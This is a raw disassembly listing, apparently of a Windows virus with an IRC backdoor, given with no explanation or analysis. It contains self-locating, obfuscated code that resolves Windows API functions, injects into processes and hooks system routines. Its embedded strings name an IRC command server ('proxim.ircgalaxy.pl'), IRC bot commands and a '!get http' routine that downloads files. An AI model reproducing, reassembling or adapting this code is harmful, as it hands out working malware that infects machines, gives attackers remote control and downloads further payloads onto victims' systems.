dd 3147A03h, 85F7107Ah, 1039C0h, 20000000h, 0BD891475h
dd 104304h, 39CCB58Dh, 8D8B0010h, 101069h, 0B957A4F3h
dd 0A73h, 1000B58Dh, 0A5F30010h, 2E300B1h, 85F7A4F3h, 1039C0h
dd 20000000h, 0AE840Fh, 73FF0000h, 0ED9DE828h, 958BFFFFh
dd 1042F4h, 840FD285h, 98h, 42B4B58Bh, 4A8B0010h, 244A8110h
dd 0E0000060h, 73084A2Bh, 3C93302h, 8D3B1472h, 101069h
dd 10698D8Bh, 56720010h, 83243C8Bh, 101069A5h, 0A7830000h
dd 69h, 87A8B00h, 3084A01h, 8BF787F7h, 1042C885h, 0C085F700h
dd 40001039h, 74000000h, 318F702h, 30290C72h, 4300B589h
dd 738B0010h, 0F7300128h, 1039C085h, 4000h, 0F7027400h
dd 2BE85118h, 59FFFFFCh, 73030CEBh, 0C722B28h, 0A4F35651h
dd 0B58D595Fh, 1039CCh, 4304BD89h, 0A4F30010h, 310F5E5Fh
dd 37878D92h, 3A000001h, 1039BE95h, 69067500h, 345678D2h
dd 50896612h, 0D9E1E8E7h, 8B5AFFFFh, 4A030C4Ah, 0C085F710h
dd 1039h, 8D200000h, 13750541h, 43008D89h, 85030010h, 101069h
dd 69A783h, 2B000000h, 87892843h, 54h, 3F7C85F7h, 10010h
dd 7740000h, 0A00843C7h, 0F7A0A0A0h, 1039C085h, 40000000h
dd 52077400h, 0FFF75BE8h, 8D8B5AFFh, 104300h, 4B8905E3h
dd 8B0DEB28h, 1042FC8Dh, 0EB02E300h, 284B8B03h, 39C085F7h
dd 30010h, 14740000h, 4304858Bh, 8D030010h, 1042ECh, 42E88503h
dd 8010010h, 8B104A8Bh, 1042B885h, 84A3900h, 4A890373h
dd 10420108h, 586383h, 42C0858Bh, 0CC680010h, 1000029h
dd 1590842h, 958A5043h, 1039BEh, 39C085F7h, 10h, 6742000h
dd 10698D03h, 0B60010h, 39C085F7h, 10h, 14750002h, 85F7C6FEh
dd 1039C0h, 40000h, 0B58A0675h, 1039BFh, 39C085F7h, 40000010h
dd 0B750000h, 0C202078Ah, 0E2D602AAh, 8A09EBF7h, 0AAC23207h
dd 0F7E2D602h, 8B64D233h, 28F6422h, 98BD8358h, 1042h, 0FABF840Fh
dd 0B5FFFFFFh, 1042B4h, 3EEE95FFh, 0B5FF0010h, 1042B0h
dd 3E6295FFh, 8D8D0010h, 10429Ch, 42A4958Dh, 52510010h
dd 0B5FF006Ah, 104298h, 3EE295FFh, 0B5FF0010h, 104298h
dd 3E6295FFh, 0B58D0010h, 104184h, 4294B5FFh, 0FF560010h
dd 103EDE95h, 98A58300h, 1042h, 0E8C3h, 6A5D0000h, 0CBED8101h
dd 58001038h, 85C10FF0h, 101588h, 83C3C085h, 0FF0FFC8h
dd 158885C1h, 3DC30010h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFAB5h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 25B812h, 0E8600000h, 0FFFFFFA5h
dd 448B3975h, 0B58D3024h, 104184h, 6608508Bh, 2063A81h
dd 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h, 103F2Eh, 8108C483h
dd 3F3F5C3Eh, 8303755Ch, 62E804C6h, 0E8FFFFFAh, 0FFFFFF7Fh
dd 74B8C361h, 0EB000000h, 2FB8B1h, 1DE80000h, 0C2000000h
dd 30B80020h, 0E8000000h, 10h, 0B80024C2h, 185h, 3E8h
dd 2CC200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h
dd 1A8B5D30h, 39A2ED81h, 0B3E80010h, 61FFFFE0h, 70004C2h
dd 5030602h, 0AACE2A01h, 0FFD6B447h, 119815h, 0FF8B01h
dd 125h dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 7Ch, 1437h dup(0)
assume ds:_data
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
jmp short $+2
push ebp
mov ebp, esp
call sub_442022
cld
cld
mov edx, edx
call sub_4420BE
jmp short $+2
cmc
mov ebp, 12FFC0h ; DATA XREF: sub_442022+C�w
stc
jmp loc_442056
start endp
; =============== S U B R O U T I N E =======================================
sub_442022 proc near ; CODE XREF: start+6�p
push dword ptr fs:0
mov fs:0, esp
xor dword ptr ds:loc_442017+1, ebp
cld
cld
mov ecx, ecx
xor eax, eax
push 8000h
push eax
push 1
push eax
push eax
push eax
push eax
push 80000000h
push eax
push eax
call ds:dword_427F70 ; GetProcAddress
loc_442056: ; CODE XREF: start+1D�j
cmc
stc
mov eax, eax
call sub_4420B6
cmc
add ebx, 6Eh
sub esi, esi
xor esi, 29CCh
nop
cld
jmp short $+2
and edx, 0
add edx, 31h
clc
cld
push ebx
xchg ebx, ebx
cld
loc_442081: ; CODE XREF: sub_442022+6D�j
call sub_4420AB
inc ebx
inc edx
sub esi, 1
mov ecx, ecx
or esi, esi
jnz short loc_442081
pop ebx
jmp short $+2
stc
mov edx, [ebp-8]
mov fs:0, edx
xchg ebx, ebx
xchg ebx, ebx
cld
nop
leave
stc
cld
jmp ebx
sub_442022 endp
; ---------------------------------------------------------------------------
clc
stc
; =============== S U B R O U T I N E =======================================
sub_4420AB proc near ; CODE XREF: sub_442022:loc_442081�p
mov al, [ebx]
nop
xor ax, dx
nop
xchg al, [ebx]
cld
retn
sub_4420AB endp
; =============== S U B R O U T I N E =======================================
sub_4420B6 proc near ; CODE XREF: sub_442022+38�p
pop ebx
mov eax, eax
mov edx, edx
push ebx
retn
sub_4420B6 endp
; ---------------------------------------------------------------------------
clc
; =============== S U B R O U T I N E =======================================
sub_4420BE proc near ; CODE XREF: start+F�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_4420BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp short $+2
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_44211A
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_44210E
mov ebx, [eax+29C1h]
jmp short loc_442118
; ---------------------------------------------------------------------------
loc_44210E: ; CODE XREF: .rsrc:00442104�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_442118: ; CODE XREF: .rsrc:0044210C�j
mov ebx, [ebx]
loc_44211A: ; CODE XREF: .rsrc:004420EC�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 80D2h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_442148
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_442148: ; CODE XREF: .rsrc:00442141�j
and ebx, 0FFFFF000h
loc_44214E: ; CODE XREF: .rsrc:0044215D�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_44215F
loc_442157: ; CODE XREF: .rsrc:0044216C�j
sub ebx, 100h
jnz short loc_44214E
loc_44215F: ; CODE XREF: .rsrc:00442155�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_442157
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_442179: ; CODE XREF: .rsrc:loc_44218D�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_44218D
cmp dword ptr [eax+5], 6441636Fh
jz short loc_442192
loc_44218D: ; CODE XREF: .rsrc:00442182�j
loop loc_442179
pop ecx
jmp short loc_4421BD
; ---------------------------------------------------------------------------
loc_442192: ; CODE XREF: .rsrc:0044218B�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_442204
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44224B
loc_4421BD: ; CODE XREF: .rsrc:00442190�j
; sub_44224B+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_4421E9
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_4421E9: ; CODE XREF: sub_44224B-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_44224B
; ---------------------------------------------------------------------------
db 76h
dd 89B953E5h, 8B000028h, 2A1030DAh, 1C083D3h, 0D686DF86h
dd 0C35BF3E2h
; ---------------------------------------------------------------------------
loc_442204: ; CODE XREF: .rsrc:004421BB�j
call near ptr loc_442213+2
inc ebx
insb
outsd
jnb short near ptr loc_442270+3
dec eax
popa
outsb
db 64h
insb
loc_442213: ; CODE XREF: .rsrc:loc_442204�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_44222F+1
inc ebx
jb short loc_44228B
popa
jz short near ptr loc_44228D+1
inc ebp
jbe short near ptr loc_44228D+4
outsb
jz short loc_442270
loc_44222F: ; CODE XREF: .rsrc:0044221E�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_44224B
inc edi
db 65h
jz short near ptr loc_44228D+1
popa
jnb short near ptr loc_4422B7+2
inc ebp
jb short near ptr loc_4422B7+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_44224B proc near ; CODE XREF: .rsrc:00442239�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004421BD SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00442601 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_44262C
test eax, eax
jz loc_4421BD
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_442601
loc_442270: ; CODE XREF: .rsrc:0044222D�j
; .rsrc:0044220C�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_44228D
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_44228B: ; CODE XREF: .rsrc:00442224�j
jmp short loc_442294
; ---------------------------------------------------------------------------
loc_44228D: ; CODE XREF: sub_44224B+2C�j
; .rsrc:00442227�j ...
and dword ptr [ebp+101598h], 0
loc_442294: ; CODE XREF: sub_44224B:loc_44228B�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_4422B7: ; CODE XREF: .rsrc:00442243�j
; .rsrc:00442246�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_442669
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_4423B0
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_442601
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_442601
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_442601
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_4423A0
jmp loc_442601
; ---------------------------------------------------------------------------
loc_4423A0: ; CODE XREF: sub_44224B+14B�p
; sub_44224B+162�j
push 1
pop ecx
jecxz short locret_4423AF
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_4423A0
; ---------------------------------------------------------------------------
locret_4423AF: ; CODE XREF: sub_44224B+158�j
retn
; ---------------------------------------------------------------------------
loc_4423B0: ; CODE XREF: sub_44224B+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_442601
call near ptr loc_4423C7+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_4423C7: ; CODE XREF: sub_44224B+172�p
add bh, bh
sub_44224B endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_442669
cmp dword ptr [ebp+103F2Eh], 0
jz loc_442601
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_442601
mov ecx, [ebp+103F06h]
jecxz short loc_442450
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_442450
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_442450: ; CODE XREF: .rsrc:00442434�j
; .rsrc:00442445�j
call sub_44260D
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_442499: ; CODE XREF: .rsrc:004424A2�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_442499
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_442601
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h
dd 6A206A54h, 1A95FFFFh, 8500103Fh, 34755FC0h, 14FE8h
dd 11E800h, 65530000h, 75626544h, 69725067h, 656C6976h
dd 57006567h, 550E8h, 88B5FF00h, 0FF001042h, 103E9E95h
dd 95FF5700h, 103E62h, 26A006Ah, 3E9295FFh, 28B90010h
dd 97000001h, 0C89E12Bh, 0FF575424h, 103ED695h, 83F63300h
dd 103F72A5h, 57540000h, 3EDA95FFh, 0C0850010h, 83466674h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 3ED295FFh, 0C0850010h
dd 0E893DC74h, 588h, 0E391C933h, 7285393Ah, 7500103Fh
dd 247C8132h, 72736324h, 81287473h, 0EAFC1h, 50545000h
dd 50505156h, 8A95FF53h, 8500103Eh, 0F7459C0h, 82474FFh
dd 3F72858Fh, 0B5E80010h, 53FFFFFDh, 3E6295FFh, 8EEB0010h
dd 128C481h, 0FF570000h, 103E6295h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44224B
loc_442601: ; CODE XREF: sub_44224B+1F�j
; sub_44224B+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_4421BD
; END OF FUNCTION CHUNK FOR sub_44224B
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_44260D proc near ; CODE XREF: .rsrc:loc_442450�p
; sub_44262C+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_44260D endp
; ---------------------------------------------------------------------------
aVx_4_2 db 'Vx_4',0
align 4
; =============== S U B R O U T I N E =======================================
sub_44262C proc near ; CODE XREF: sub_44224B+9�p
; .rsrc:loc_443027�p
xor ecx, ecx
call sub_44260D
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_44262C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 3 dup(58h)
dd 332800h, 0E7300h, 3 dup(0)
dd 29C000h, 0
db 0
; =============== S U B R O U T I N E =======================================
sub_442669 proc near ; CODE XREF: sub_44224B+7C�p
; .rsrc:004423DF�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_442674: ; CODE XREF: sub_442669+E�j
lodsb
test al, al
jnz short loc_442674
loop sub_442669
retn
sub_442669 endp
; ---------------------------------------------------------------------------
dd 1985958Dh, 0FF520010h, 103EC695h, 88858900h, 0E8001042h
dd 16h, 6B6F6F4Ch, 72507075h, 6C697669h, 56656765h, 65756C61h
dd 0FF500041h, 103E6E95h, 8C858900h, 0C3001042h, 7361425Ch
dd 6D614E65h, 624F6465h, 7463656Ah, 74565C73h, 74636553h
dd 74736C00h, 6E656C72h, 65724300h, 46657461h, 41656C69h
dd 65724300h, 46657461h, 4D656C69h, 69707061h, 41676Eh
dd 61657243h, 72506574h, 7365636Fh, 43004173h, 74616572h
dd 6D655265h, 5465746Fh, 61657268h, 72430064h, 65746165h
dd 65726854h, 43006461h, 74616572h, 6F6F5465h, 6C65686Ch
dd 53323370h, 7370616Eh, 746F68h, 74697845h, 65726854h
dd 46006461h, 54656C69h, 54656D69h, 7379536Fh, 546D6574h
dd 656D69h, 65657246h, 7262694Ch, 797261h, 46746547h, 41656C69h
dd 69727474h, 65747562h, 47004173h, 69467465h, 6953656Ch
dd 4700657Ah, 69467465h, 6954656Ch, 4700656Dh, 6F4D7465h
dd 656C7564h, 646E6148h, 41656Ch, 54746547h, 46706D65h
dd 4E656C69h, 41656D61h, 74654700h, 706D6554h, 68746150h
dd 65470041h, 72655674h, 6E6F6973h, 74654700h, 73726556h
dd 456E6F69h, 47004178h, 6F567465h, 656D756Ch, 6F666E49h
dd 74616D72h, 416E6F69h, 616F4C00h, 62694C64h, 79726172h
dd 614D0041h, 65695670h, 46664F77h, 656C69h, 6E65704Fh
dd 656C6946h, 7070614Dh, 41676E69h, 65704F00h, 6F72506Eh
dd 73736563h, 6F725000h, 73736563h, 69463233h, 747372h
dd 636F7250h, 33737365h, 78654E32h, 65530074h, 6C694674h
dd 74744165h, 75626972h, 41736574h, 74655300h, 656C6946h
dd 656D6954h, 656C5300h, 53007065h, 65747379h, 6D69546Dh
dd 466F5465h, 54656C69h, 656D69h, 616D6E55h, 65695670h
dd 46664F77h, 656C69h, 74726956h, 416C6175h, 636F6C6Ch
dd 69725700h, 69466574h, 4E00656Ch, 6A644174h, 50747375h
dd 69766972h, 6567656Ch, 6B6F5473h, 4E006E65h, 65724374h
dd 46657461h, 656C69h, 7243744Eh, 65746165h, 636F7250h
dd 737365h, 7243744Eh, 65746165h, 636F7250h, 45737365h
dd 744E0078h, 61657243h, 65536574h, 6F697463h, 744E006Eh
dd 61657243h, 73556574h, 72507265h, 7365636Fh, 744E0073h
dd 5670614Dh, 4F776569h, 63655366h, 6E6F6974h, 4F744E00h
dd 466E6570h, 656C69h, 704F744Eh, 72506E65h, 7365636Fh
dd 6B6F5473h, 4E006E65h, 65704F74h, 6365536Eh, 6E6F6974h
dd 50744E00h, 65746F72h, 69567463h, 61757472h, 6D654D6Ch
dd 79726Fh, 7551744Eh, 49797265h, 726F666Eh, 6974616Dh
dd 6F546E6Fh, 6E656Bh, 7257744Eh, 56657469h, 75747269h
dd 654D6C61h, 79726F6Dh, 6C745200h, 63696E55h, 5365646Fh
dd 6E697274h, 416F5467h, 5369736Eh, 6E697274h, 53570067h
dd 61745341h, 70757472h, 6F6C6300h, 6F736573h, 74656B63h
dd 6E6F6300h, 7463656Eh, 74656700h, 74736F68h, 616E7962h
dd 7200656Dh, 766365h, 646E6573h, 636F7300h, 74656Bh, 65746E49h
dd 74656E72h, 736F6C43h, 6E614865h, 656C64h, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 6E490065h, 6E726574h, 704F7465h, 416E65h, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 746E4900h, 656E7265h
dd 61655274h, 6C694664h, 44410065h, 49504156h, 442E3233h
dd 52004C4Ch, 6C436765h, 4B65736Fh, 52007965h, 704F6765h
dd 654B6E65h, 41784579h, 67655200h, 72657551h, 6C615679h
dd 78456575h, 65520041h, 74655367h, 756C6156h, 41784565h
dd 0F6335600h, 5656026Ah, 16AD48Bh, 1872FF52h, 8C95FF56h
dd 8B001042h, 565656C4h, 70FF5650h, 0FA95FF18h, 8300103Eh
dd 0C25E10C4h, 498D0008h, 51C82BFBh, 68h, 244C8DE8h, 6A006A03h
dd 53505105h, 0CC8B056Ah, 50D48B50h, 51406A54h, 95FF5352h
dd 103F22h, 0FF0CC483h, 103F2A95h, 8C48300h, 30958DC3h
dd 3300103Eh, 52006AC9h, 32003068h, 51C48B00h, 50406A51h
dd 83186A51h, 6A5408C0h, 95FF500Eh, 103F1Eh, 3320C483h
dd 0FC085D2h, 0DAF7C299h, 0C3C22358h, 0E8FF3357h, 0FFFFFFC1h
dd 0A5840Fh, 68500000h, 7328h, 6AD48Bh, 406ACC8Bh, 10000068h
dd 52026A00h, 2868006Ah, 6A000073h, 50535100h, 3F1295FFh
dd 595F0010h, 3E6295FFh, 0FF850010h, 8D8B7174h, 101590h
dd 958D0CE3h, 101000h, 5357D103h, 858BD2FFh, 103EFEh, 29168F8Dh
dd 2BE80000h, 8BFFFFFFh, 103F1685h, 638F8D00h, 0E8000029h
dd 0FFFFFF1Ah, 3F02858Bh, 8F8D0010h, 296Ah, 0FFFF09E8h
dd 6858BFFh, 8500103Fh, 8D2074C0h, 29778Fh, 0FEF4E800h
dd 858BFFFFh, 103F0Eh, 0B74C085h, 29848F8Dh, 0DFE80000h
dd 8BFFFFFEh, 55C35FC7h, 0E8h, 0ED815D00h, 101B24h, 858DC933h
dd 101EAFh, 51515451h, 0FF515150h, 103E8E95h, 24048700h
dd 3E6295FFh, 0C25D0010h, 0E8550004h, 0
dd 53ED815Dh, 6A00101Bh, 1E958DFFh, 5000101Bh, 2420CD52h
dd 83002A00h, 0C7660CC4h, 101B6485h, 0C720CD00h, 101B6685h
dd 2A002400h, 6AC35D00h, 9E8581Ah, 8D000000h, 0FEAA6142h
dd 0C3F075C9h, 3F7C9569h, 84050010h, 89420808h, 103F7C95h
dd 0C3E2F700h, 0E855h, 815D0000h, 101BADEDh, 809D8B00h
dd 8300103Fh, 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h
dd 95FF0000h, 103EB6h, 848DFC8Bh, 10424h, 6A5000h, 4E8h
dd 52525600h, 95FF5700h, 103EB2h, 978DC933h, 104h, 26A5151h
dd 68016A51h, 40000000h, 7E95FF52h, 9600103Eh, 5B74F685h
dd 4685450h, 57000001h, 2024B4FFh, 0FF000002h, 103F5E95h
dd 0C0855900h, 14E31674h, 6AD48B50h, 57515200h, 0F695FF56h
dd 5900103Eh, 0D075C085h, 6295FF56h, 8D00103Eh, 57524457h
dd 8D58446Ah, 10497h, 0C033AB00h, 0F359106Ah, 505050ABh
dd 50505050h, 8695FF52h, 8100103Eh, 208C4h, 2474FF00h
dd 4E95FF08h, 5300103Fh, 3F4E95FFh, 0C25D0010h, 3E800004h
dd 4601750Ah, 158C8D8Bh, 19E30010h, 1000958Dh, 0D1030010h
dd 84D2FF56h, 1F880FC0h, 0F000001h, 11084h, 3A3E8000h
dd 80461075h, 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h
dd 0CF8B4275h, 4F0146C6h, 6A51CE2Bh, 53565100h, 3F4695FFh
dd 3B590010h, 0DF850FC1h, 8D000000h, 101EA385h, 68006A00h
dd 0Ch, 95FF5350h, 103F46h, 0C3Dh, 0BF850F00h, 0E9000000h
dd 0B1h, 52503E81h, 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch
dd 99h, 0F375203Ch, 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h
dd 74656721h, 3CAC7F75h, 817C7520h, 6820FF7Eh, 71757474h
dd 70037E81h, 752F2F3Ah, 0FF47C668h, 0BA310F00h, 2710h
dd 0FF52E2F7h, 103EE695h, 50C03300h, 0E8505050h, 9, 6E776F44h
dd 64616F6Ch, 5695FF00h, 8500103Fh, 333674C0h, 808589C9h
dd 5100103Fh, 20068h, 56515180h, 5A95FF50h, 8D00103Fh
dd 101BA795h, 0C9335000h, 52505154h, 95FF5151h, 103E8Eh
dd 0FF240487h, 103E6295h, 80C3F800h, 10157F8Dh, 0C3F90100h
dd 16A016Ah, 73FF33FFh, 8515FF04h, 335A74C0h, 0B3D08BDBh
dd 3C50030Bh, 1DCBB58Dh, 0BA8B0010h, 10Ch, 1088A8Bh, 0F8030000h
dd 8B60CB2Bh, 61A6F3CBh, 0E2470574h, 832EEBF5h, 8B530FC7h
dd 0D48B57CCh, 406A5450h, 0FF6A5251h, 3F2295FFh, 8D8B0010h
dd 103E96h, 2B0CC483h, 7E983CFh, 6A07C7h, 4F8900E8h, 4F53C303h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 50000002h, 0
aProxim_ircgala db 'proxim.ircgalaxy.pl',0
; ---------------------------------------------------------------------------
dec esi
dec ecx
inc ebx
dec ebx
and [esi+6Eh], ah
db 64h
push 64h
ja short near ptr loc_442FE1+1
popa
or dl, [ebp+53h]
inc ebp
push edx
and [ebp+4Ah], ah
dec edi
dec ecx
dec esi
and [esi], ah
jbe short loc_442FE1
jb short loc_442FEE
jnz short near ptr loc_442F83+3
push ebp
call $+5
pop ebp
loc_442F83: ; CODE XREF: .rsrc:00442F7A�j
sub ebp, 101EB5h
mov byte ptr [ebp+10157Fh], 0
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz short loc_442FD7
push 1Eh
mov esi, [ebp+103E72h]
pop ecx
loc_442FA4: ; CODE XREF: .rsrc:loc_442FD3�j
lodsb
cmp al, 2Eh
jnz short loc_442FD3
cmp word ptr [esi], 1DFFh
jnz short loc_442FD3
lea edi, [ebp+103F76h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+1038ECh]
pop dword ptr [ebp+103912h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_442FD3: ; CODE XREF: .rsrc:00442FA7�j
; .rsrc:00442FAE�j
loop loc_442FA4
jmp short loc_443027
; ---------------------------------------------------------------------------
loc_442FD7: ; CODE XREF: .rsrc:00442F99�j
call near ptr dword_44267C+481h
cmp dword ptr [esp+8], 4
loc_442FE1: ; CODE XREF: .rsrc:00442F76�j
; .rsrc:00442F66�j
jnz short loc_443027
call near ptr loc_442FEF+1
push ebx
inc esi
inc ebx
db 2Eh
inc esp
dec esp
loc_442FEE: ; CODE XREF: .rsrc:00442F78�j
dec esp
loc_442FEF: ; CODE XREF: .rsrc:00442FE3�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add [ebx], cl
sal byte ptr [ebp+ecx-6Dh], 6Ah
add dl, [ebx-1]
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
call eax
xchg eax, ebx
call near ptr dword_442C20+283h
call near ptr loc_44301B+1
push ebx
inc esi
inc ebx
pop edi
dec edi
push ebx
db 2Eh
inc esp
dec esp
dec esp
loc_44301B: ; CODE XREF: .rsrc:0044300C�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
loc_443023: ; CODE XREF: .rsrc:loc_443023�j
jl short loc_443023
; ---------------------------------------------------------------------------
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_443027: ; CODE XREF: .rsrc:00442FD5�j
; .rsrc:loc_442FE1�j
call sub_44262C
dec dword ptr [ebp+1012D4h]
xor ecx, ecx
lea eax, [ebp+104324h]
push ecx
push ecx
push ecx
push ecx
push eax
push ecx
push ecx
push ecx
call dword ptr [ebp+103EC2h]
call near ptr loc_443057+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_443057: ; CODE XREF: .rsrc:00443048�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
db 2 dup(0), 77h
aSprintfa db 'sprintfA',0
db 50h, 0FFh, 95h
dd 103E6Eh, 3E768589h, 310F0010h, 19858D8Dh, 85890010h
dd 103F7Ch, 0C695FF51h, 9300103Eh, 468h, 92B58D00h, 59001019h
dd 3F62BD8Dh, 0C2E80010h, 66FFFFF5h, 1E7585C7h, 50000010h
dd 1E77A583h, 8D000010h, 101E3595h, 6A545000h, 52006A01h
dd 268h, 6695FF80h, 8500103Fh, 22755AC0h, 1E688D8Dh, 6A520010h
